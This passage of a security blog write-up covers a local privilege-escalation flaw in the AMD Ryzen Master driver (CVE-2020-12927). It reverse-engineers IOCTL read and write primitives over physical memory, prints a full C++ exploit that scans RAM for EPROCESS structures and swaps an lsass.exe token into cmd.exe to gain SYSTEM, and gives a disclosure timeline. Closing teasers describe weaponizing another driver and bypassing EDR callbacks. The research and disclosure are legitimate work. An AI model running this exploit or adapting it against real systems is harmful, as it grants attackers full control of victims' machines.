Looking a bit closer at the loop, we can see a few interesting things. ecx is essentially a counter here as its set equal to our already mentioned counters eax and [rsp+48h+var_24]. We also see there is a mov to [rdx+rcx] from al. A single byte is written to the location of rdx + rcx. So we can make a guess that rdx is a base address and rcx is an offset. This is what a traditional for loop would seem to look like disassembled. al is taken from another similar construction in [r8+rax] where rax is now acting as the offset and r8 is a different base address.

So all in all, I decided this looks like a routine that is either doing a byte by byte read or a byte by byte write to kernel memory most likely. But if you look closely, you can see that the pointer returned from MmMapIoSpace is the one that al is written to (while tracking an offset) because it is eventually moved into rdx for the mov [rdx+rcx], al operation. This was exciting for me because if we can control the parameters of MmMapIoSpace, we will possibly be able to specify a physical memory address and offset and copy a user controlled buffer into that space once it is mapped into our process space. This is essentially a write what where primitive!

Looking at the first cross-reference to this routine, I started working my way back up the call graph until I was able to locate a probable IOCTL code.

After banging my head against my desk for hours trying to pass all of the checks to reach our glorious write what where routine, I was finally able to reach it and get a reliable BSOD. The checks were looking at the sizes of my input and output buffers supplied to my DeviceIoControl call. I was able to solve this by simply stringing together random length buffers of something like AAAAAAAABBBBBBBBCCCCCCCC etc, and seeing how the program would parse my input. Eventually I was able to figure out that the input buffer was structured as follows:

  • first 8 bytes of my input buffer would be the desired physical address you want mapped,
  • the next 4 bytes would represent the NumberOfBytes parameter,
  • and finally, and this is what took me the longest, the next 8 bytes were to be a pointer to the buffer you wanted to overwrite the mapped kernel memory with.

Very cool! We have control over all the MmMapIoSpace params except CacheType and we can specify what buffer to copy over!

This is progress, I was fairly certain at this point I had a write primitive; however, I wasn’t exactly sure what to do with it. At this point, I reasoned that if a routine existed to do a byte by byte write to a kernel buffer somewhere, I probably also had the ability to do a byte by byte read of a kernel buffer. So I set out to find my routine’s sibling, the read what where routine (if she existed).

Read What Where

Now I went back to the other cross references of MmMapIoSpace calls and eventually came upon this routine, sub_1400063D0.

You’d be forgiven if you think it looks just like the last routine we analyzed, I know I did and missed it initially; however, this routine differs in one major way. Instead of copying byte by byte out of our process space buffer and into a kernel buffer, we are copying byte by byte out of a kernel buffer and into our process space buffer. I will spare you the technical analysis here but it is essentially our other routine except only the source and destinations are reversed! This is our read what where primitive and I was able to back track a cross reference in IDA to this IOCTL.

There were a lot of rabbit holes here to go down but eventually this one ended up being straightforward once I found a clear cut code path to the routine from the IOCTL call graph.

Once again, we control the important MmMapIoSpace parameters and, this is a difference from the other IOCTL, the byte by byte transfer occurs in our DeviceIoControl output buffer argument at an offset of 0xC bytes. So we can tell the driver to read physical memory from an arbitrary address, for an arbitrary length, and send us the results!

With these two powerful primitives, I tried to recreate my previous exploitation strategy employed in my last post.

Exploitation

Here I will try to walk through some code snippets and explain my thinking. Apologies for any programming mistakes in this PoC code; however, it works reliably on all the testing I performed (and it worked well enough for AMD to patch the driver.)

First, we’ll need to understand what I’m fishing for here. As I explained in my previous post, I tried to employ the same strategy that @b33f did with his driver exploit and fish for "Proc" tags in the kernel pool memory. Please refer to that post for any questions here. The TL;DR here is that information about processes are stored in the EPROCESS structure in the kernel and some of the important members for our purposes are:

  • ImageFileName (this is the name of the process)
  • UniqueProcessId (the PID)
  • Token (this is a security token value)

The offsets from the beginning of the structure to these members was as follows on my build:

  • 0x2e8 to the UniqueProcessId
  • 0x360 to the Token
  • 0x450 to the ImageFileName

You can see the offsets in WinDBG:

kd> !process 0 0 lsass.exe
PROCESS ffffd48ca64e7180
    SessionId: 0  Cid: 0260    Peb: 63d241d000  ParentCid: 01f0
    DirBase: 1c299b002  ObjectTable: ffffe60f220f2580  HandleCount: 1155.
    Image: lsass.exe

kd> dt nt!_EPROCESS ffffd48ca64e7180 UniqueProcessId Token ImageFilename
   +0x2e8 UniqueProcessId : 0x00000000`00000260 Void
   +0x360 Token           : _EX_FAST_REF
   +0x450 ImageFileName   : [15]  "lsass.exe"

Each data structure in the kernel pool has various headers, (thanks to ReWolf for breaking this down so well):

  • POOL_HEADER structure (this is where our "Proc" tag will reside),
  • OBJECT_HEADER_xxx_INFO structures,
  • OBJECT_HEADER which, contains a Body where the EPROCESS structure lives.

As b33f explains, in his write-up, all of the addresses where one begins looking for a "Proc" tag are 0x10 aligned, so every address here ends in a 0. We know that at some arbitrary address ending in 0, if we look at <address> + 0x4 that is where a "Proc" tag might be.

Leveraging Read What Where

The difficulty on my Windows build was that the length from my "Proc" tag once found, to the beginning of the EPROCESS structure where I know the offsets to the members I want varied wildly. So much so that in order to get the exploit working reliably, I just simply had to create my own data structure and store instances of them in a vector. The data structure was as follows:

struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

So as I’m using our Read What Where primitive to blow through all the RAM hunting for "Proc", if I find an instance of "Proc" I’ll iterate 0x10 bytes at a time until I find a marker signifying the end of our pool headers and the beginning of EPROCESS. This marker was 0x00B80003. So now, I’ll have the proc_address the literal place where "Proc" was and store that in PROC_DATA.proc_address, I’ll also annotate how far that address was from the nearest page-aligned memory address (a multiple of 0x1000) in PROC_DATA.proc_address and also annotate how far from "Proc" it was until we reached our marker or the beginning of EPROCESS in PROC.header_size. These will all be stored in a vector.

You can see this routine here:

INT64 results_begin = ((INT64)output_buff + 0xc);
        for (INT64 i = 0; i < 0xF60; i = i + 0x10) {

            PINT64 proc_ptr = (PINT64)(results_begin + 0x4 + i);
            INT32 proc_val = *(PINT32)proc_ptr;

            if (proc_val == 0x636f7250) {

                for (INT64 x = 0; x < 0xA0; x = x + 0x10) {

                    PINT64 header_ptr = PINT64(results_begin + i + x);
                    INT32 header_val = *(PINT32)header_ptr;

                    if (header_val == 0x00B80003) {

                        proc_count++;
                        cout << "\r[>] Proc chunks found: " << dec <<
                            proc_count << flush;

                        INT64 temp_addr = input_buff.start_address + i;

                        // This address might not be page-aligned to 0x1000
                        // so find out how far off from a multiple of 
                        // 0x1000 we are. This value is stored in our 
                        // PROC_DATA struct in the page_entry_offset
                        // member.
                        INT64 modulus = temp_addr % 0x1000;
                        proc_data.page_entry_offset.push_back(modulus);

                        // This is the page-aligned address where, either
                        // small or large paged memory will hold our "Proc"
                        // chunk. We store this as our proc_address member
                        // in PROC_DATA.
                        INT64 page_address = temp_addr - modulus;
                        proc_data.proc_address.push_back(
                            page_address);
                        proc_data.header_size.push_back(x);
                    }
                }
            }
        }

It will be more obvious with the entire exploit code, but what I’m doing here is basically starting from a physical address, and calling our read what where with a read size of 0x100c (0x1000 + 0xc as required so we can capture a whole page of memory and still keep our returned metadata information that starts at offset 0xc in our output buffer) in a loop all the while adding these discovered PROC_DATA structures to a vector. Once we hit our max address or max iterations, we’ll send this vector over to a second routine that parses out all the data we care about like the EPROCESS members we care about.

It is important to note that I took great care to make sure that all calls to MmMapIoSpace used page-aligned physical addresses as this is the most stable way to call the API

Now that I knew exactly how many "Proc" chunks I had found and stored all their relevant metadata in a vector, I could start a second routine that would use that metadata to check for their EPROCESS member values to see if they were processes I cared about.

My strategy here was to find the EPROCESS members for a privileged process such as lsass.exe and swap its security token with the security token of a cmd.exe process that I owned. You can see a portion of that code here:

INT64 results_begin = ((INT64)output_buff + 0xc);

        INT64 imagename_address = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x450; //ImageFileName
        INT64 imagename_value = *(PINT64)imagename_address;

        INT64 proc_token_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x360; //Token
        INT64 proc_token = *(PINT64)proc_token_addr;

        INT64 pid_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x2e8; //UniqueProcessId
        INT64 pid_value = *(PINT64)pid_addr;

        int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
            imagename_value);

        if (sys_result != 0) {

            system_token_count++;
            system_tokens.token_name.push_back(imagename_value);
            system_tokens.token_value.push_back(proc_token);
        }

        if (imagename_value == 0x6578652e646d63) {
            //cout << "[>] cmd.exe found!\n";
            cmd_token_address = (start_address + proc_data.header_size[i] +
                proc_data.page_entry_offset[i] + 0x360);
        }
    }

    if (system_tokens.token_name.size() != 0 and cmd_token_address != 0) {
        cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
        cout << "[>] Let's swap tokens!\n";
    }
    else if (cmd_token_address == 0) {
        cout << "[!] No cmd.exe token address found, exiting...\n";
        exit(1);
    }

So now at this point I had the location and values of every thing I cared about and it was time to leverage the Write What Where routine we had found.

Leveraging Write What Where

The problem I was facing was that I need my calls to MmMapIoSpace to be page-aligned so that the calls remain stable and we don’t get any unnecessary BSODs.

So let’s picture a page of memory as a line.

<—————–MEMORY PAGE—————–>

We can only write in page-size chunks; however, the value we want to overwrite, the value of the cmd.exe process’s Token, is most-likely not page-aligned. So now we have this:

<———TOKEN——————————->

I could do a direct write at the exact address of this Token value, but my call to MmMapIoSpace would not be page-aligned.

So what I did was one more Read What Where call to store everything on that page of memory in a buffer and then overwrite the cmd.exe Token with the lsass.exe Token and then use that buffer in my call to the Write What Where routine.

So instead of an 8 byte write to simply overwrite the value, I’d be opting to completely overwrite that entire page of memory but only changing 8 bytes, that way the calls to MmMapIoSpace stay clean.

You can see some of that math in the code snippet below with references to modulus. Remember that the Write What Where utilized the input buffer of DeviceIoControl as the buffer it would copy over into the kernel memory:

if (!DeviceIoControl(
        hFile,
        READ_IOCTL,
        &input_buff,
        0x40,
        output_buff,
        modulus + 0xc,
        &bytes_ret,
        NULL))
    {
        cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
        cout << "[!] Last error: " << hex << GetLastError() << "\n";
        exit(1);
    }

    PBYTE results = (PBYTE)((INT64)output_buff + 0xc);

    PBYTE cmd_page_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
   

    DWORD num_of_bytes = modulus + 0x8;

    INT64 start_address = cmd_token_address;
    cout << "[>] cmd.exe token located at: " << hex << start_address << "\n";
    INT64 new_token_val = system_tokens.token_value[0];
    cout << "[>] Overwriting token with value: " << hex << new_token_val << "\n";

    memcpy(cmd_page_buff, results, modulus);
    memcpy(cmd_page_buff + modulus, (void*)&new_token_val, 0x8);

    // PhysicalAddress
    // NumberOfBytes
    // Buffer to be copied into system space
    BYTE input[0x1000] = { 0 };
    memcpy(input, (void*)&cmd_page, 0x8);
    memcpy(input + 0x8, (void*)&num_of_bytes, 0x4);
    memcpy(input + 0xc, cmd_page_buff, modulus + 0x8);

    if (DeviceIoControl(
        hFile,
        WRITE_IOCTL,
        input,
        modulus + 0x8 + 0xc,
        NULL,
        0,
        &bytes_ret,
        NULL))
    {
        cout << "[>] Write operation succeeded, you should be nt authority/system\n";
    }
    else {
        cout << "[!] Write operation failed, exiting...\n";
        exit(1);
    }

Final Results

You can see the mandatory full exploit screenshot below:

Disclosure Timeline

Big thanks to Tod Beardsley at Rapid7 for his help with the disclosure process!

  • 1 May 2020: Vendor notified of vulnerability
  • 1 May 2020: Vendor acknowledges vulnerability
  • 18 May 2020: Vendor supplies patch, restricting driver access to Administrator group
  • 18 May 2020 - 11 July 2020: Back and forth about CVE assignment
  • 23 Aug 2020 - CVE-2020-12927 assigned
  • 13 Oct 2020 - Joint Disclosure

Exploit Proof of Concept

#include <iostream>
#include <vector>
#include <chrono>
#include <iomanip>
#include <Windows.h>
using namespace std;

#define DEVICE_NAME         "\\\\.\\AMDRyzenMasterDriverV15"
#define WRITE_IOCTL         (DWORD)0x81112F0C
#define READ_IOCTL          (DWORD)0x81112F08
#define START_ADDRESS       (INT64)0x100000000
#define STOP_ADDRESS        (INT64)0x240000000

// Creating vector of hex representation of ImageFileNames of common 
// SYSTEM processes, eg. 'wmlms.exe' = hex('exe.smlw')
vector<INT64> SYSTEM_procs = {
    //0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    //0x6578652e73736d73,         // smss.exe
    //0x7365636976726573,         // services.exe
    //0x6b6f72426d726753,         // SgrmBroker.exe
    //0x2e76736c6f6f7073,         // spoolsv.exe
    //0x6e6f676f6c6e6977,         // winlogon.exe
    //0x2e74696e696e6977,         // wininit.exe
    //0x6578652e736d6c77,         // wlms.exe
};

typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    PBYTE write_buff;
} WRITE_INPUT_BUFFER;

typedef struct {
    INT64 start_address;
    DWORD num_of_bytes;
    char receiving_buff[0x1000];
} READ_INPUT_BUFFER;

// This struct will hold the address of a "Proc" tag's page entry, 
// that Proc chunk's header size, and how far into the page the "Proc" tag is
struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

struct SYSTEM_TOKENS {
    std::vector<INT64> token_name;
    std::vector<INT64> token_value;
} system_tokens;

INT64 cmd_token_address = 0;

HANDLE grab_handle(const char* device_name) {

    HANDLE hFile = CreateFileA(
        device_name,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        cout << "[!] Unable to grab handle to " << DEVICE_NAME << "\n";
        exit(1);
    }
    else
    {
        cout << "[>] Grabbed handle 0x" << hex
            << (INT64)hFile << "\n";

        return hFile;
    }
}

PROC_DATA read_mem(HANDLE hFile) {

    cout << "[>] Reading through RAM for Proc tags...\n";
    DWORD num_of_bytes = 0x1000;

    LPVOID output_buff = VirtualAlloc(NULL,
        0x100c,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    PROC_DATA proc_data;

    int proc_count = 0;
    INT64 iteration = 0;
    while (true) {

        INT64 start_address = START_ADDRESS + (0x1000 * iteration);
        if (start_address >= 0x240000000) {
            cout << "\n[>] Max address reached.\n";
            cout << "[>] Number of iterations: " << dec << iteration << "\n";
            return proc_data;
        }

        READ_INPUT_BUFFER input_buff = { start_address, num_of_bytes };

        DWORD bytes_ret = 0;

        //cout << "[>] User buffer allocated at: 0x" << hex << output_buff << "\n";
        //Sleep(500);

        if (DeviceIoControl(
            hFile,
            READ_IOCTL,
            &input_buff,
            0x40,
            output_buff,
            0x100c,
            &bytes_ret,
            NULL))
        {
            //cout << "[>] DeviceIoControl succeeded!\n";
        }

        iteration++;

        //DebugBreak();
        INT64 results_begin = ((INT64)output_buff + 0xc);
        for (INT64 i = 0; i < 0xF60; i = i + 0x10) {

            PINT64 proc_ptr = (PINT64)(results_begin + 0x4 + i);
            INT32 proc_val = *(PINT32)proc_ptr;

            if (proc_val == 0x636f7250) {

                for (INT64 x = 0; x < 0xA0; x = x + 0x10) {

                    PINT64 header_ptr = PINT64(results_begin + i + x);
                    INT32 header_val = *(PINT32)header_ptr;

                    if (header_val == 0x00B80003) {

                        proc_count++;
                        cout << "\r[>] Proc chunks found: " << dec <<
                            proc_count << flush;

                        INT64 temp_addr = input_buff.start_address + i;

                        // This address might not be page-aligned to 0x1000
                        // so find out how far off from a multiple of 
                        // 0x1000 we are. This value is stored in our 
                        // PROC_DATA struct in the page_entry_offset
                        // member.
                        INT64 modulus = temp_addr % 0x1000;
                        proc_data.page_entry_offset.push_back(modulus);

                        // This is the page-aligned address where, either
                        // small or large paged memory will hold our "Proc"
                        // chunk. We store this as our proc_address member
                        // in PROC_DATA.
                        INT64 page_address = temp_addr - modulus;
                        proc_data.proc_address.push_back(
                            page_address);
                        proc_data.header_size.push_back(x);
                    }
                }
            }
        }
    }
}

void parse_procs(PROC_DATA proc_data, HANDLE hFile) {

    int system_token_count = 0;
    DWORD bytes_ret = 0;
    DWORD num_of_bytes = 0x1000;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x100c,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.header_size.size(); i++) {

        INT64 start_address = proc_data.proc_address[i];
        READ_INPUT_BUFFER input_buff = { start_address, num_of_bytes };

        if (DeviceIoControl(
            hFile,
            READ_IOCTL,
            &input_buff,
            0x40,
            output_buff,
            0x100c,
            &bytes_ret,
            NULL))
        {
            //cout << "[>] DeviceIoControl succeeded!\n";
        }

        INT64 results_begin = ((INT64)output_buff + 0xc);

        INT64 imagename_address = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x450; //ImageFileName
        INT64 imagename_value = *(PINT64)imagename_address;

        INT64 proc_token_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x360; //Token
        INT64 proc_token = *(PINT64)proc_token_addr;

        INT64 pid_addr = results_begin +
            proc_data.header_size[i] + proc_data.page_entry_offset[i]
            + 0x2e8; //UniqueProcessId
        INT64 pid_value = *(PINT64)pid_addr;

        int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
            imagename_value);

        if (sys_result != 0) {

            system_token_count++;
            system_tokens.token_name.push_back(imagename_value);
            system_tokens.token_value.push_back(proc_token);
        }

        if (imagename_value == 0x6578652e646d63) {
            //cout << "[>] cmd.exe found!\n";
            cmd_token_address = (start_address + proc_data.header_size[i] +
                proc_data.page_entry_offset[i] + 0x360);
        }
    }

    if (system_tokens.token_name.size() != 0 and cmd_token_address != 0) {
        cout << "\n[>] cmd.exe and SYSTEM token information found!\n";
        cout << "[>] Let's swap tokens!\n";
    }
    else if (cmd_token_address == 0) {
        cout << "[!] No cmd.exe token address found, exiting...\n";
        exit(1);
    }
}

void write(HANDLE hFile) {

    DWORD modulus = cmd_token_address % 0x1000;
    INT64 cmd_page = cmd_token_address - modulus;
    DWORD bytes_ret = 0x0;
    DWORD read_num_bytes = modulus;

    PBYTE output_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0xc,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    READ_INPUT_BUFFER input_buff = { cmd_page, read_num_bytes };

    if (!DeviceIoControl(
        hFile,
        READ_IOCTL,
        &input_buff,
        0x40,
        output_buff,
        modulus + 0xc,
        &bytes_ret,
        NULL))
    {
        cout << "[!] Failed the read operation to copy the cmd.exe page...\n";
        cout << "[!] Last error: " << hex << GetLastError() << "\n";
        exit(1);
    }

    PBYTE results = (PBYTE)((INT64)output_buff + 0xc);

    PBYTE cmd_page_buff = (PBYTE)VirtualAlloc(
        NULL,
        modulus + 0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);
   

    DWORD num_of_bytes = modulus + 0x8;

    INT64 start_address = cmd_token_address;
    cout << "[>] cmd.exe token located at: " << hex << start_address << "\n";
    INT64 new_token_val = system_tokens.token_value[0];
    cout << "[>] Overwriting token with value: " << hex << new_token_val << "\n";

    memcpy(cmd_page_buff, results, modulus);
    memcpy(cmd_page_buff + modulus, (void*)&new_token_val, 0x8);

    // PhysicalAddress
    // NumberOfBytes
    // Buffer to be copied into system space
    BYTE input[0x1000] = { 0 };
    memcpy(input, (void*)&cmd_page, 0x8);
    memcpy(input + 0x8, (void*)&num_of_bytes, 0x4);
    memcpy(input + 0xc, cmd_page_buff, modulus + 0x8);

    if (DeviceIoControl(
        hFile,
        WRITE_IOCTL,
        input,
        modulus + 0x8 + 0xc,
        NULL,
        0,
        &bytes_ret,
        NULL))
    {
        cout << "[>] Write operation succeeded, you should be nt authority/system\n";
    }
    else {
        cout << "[!] Write operation failed, exiting...\n";
        exit(1);
    }
}

int main()
{
    srand((unsigned)time(0));
    HANDLE hFile = grab_handle(DEVICE_NAME);

    PROC_DATA proc_data = read_mem(hFile);

    cout << "\n[>] Parsing procs...\n";
    parse_procs(proc_data, hFile);

    write(hFile);
}

Kernel exploitation: weaponizing CVE-2020-17382 MSI Ambient Link driver

24 September 2020 at 00:00
Preamble - Why are drivers still a valuable target? Kernels are, no euphemism intended, complex piece of software and the Windows OS is no exception. Being one of the toughest to scrutinize due to its lack of source code and undocumented APIs, it is now being more documented thanks to the immense effort from the research community. Regrettably, during recent times, it has also increased in complexity and its mitigation way improved.

Silencing the EDR. How to disable process, threads and image-loading detection callbacks.

15 July 2020 at 00:00
Backround - TL;DR This post is about resuming the very inspiring Rui’s piece on Windows Kernel’s callbacks and taking it a little further by extending new functionalities and build an all-purpose AV/EDR runtime detection bypass. Specifically, we are going to see how Kaspersky Total Security and Windows Defender are using kernel callbacks to either inhibit us from accessing LSASS loaded module or detect malicious activities. We’ll then use our evil driver to temporarily silence any registered AV’s callbacks and restore EDR original code once we are done with our task.
❌
❌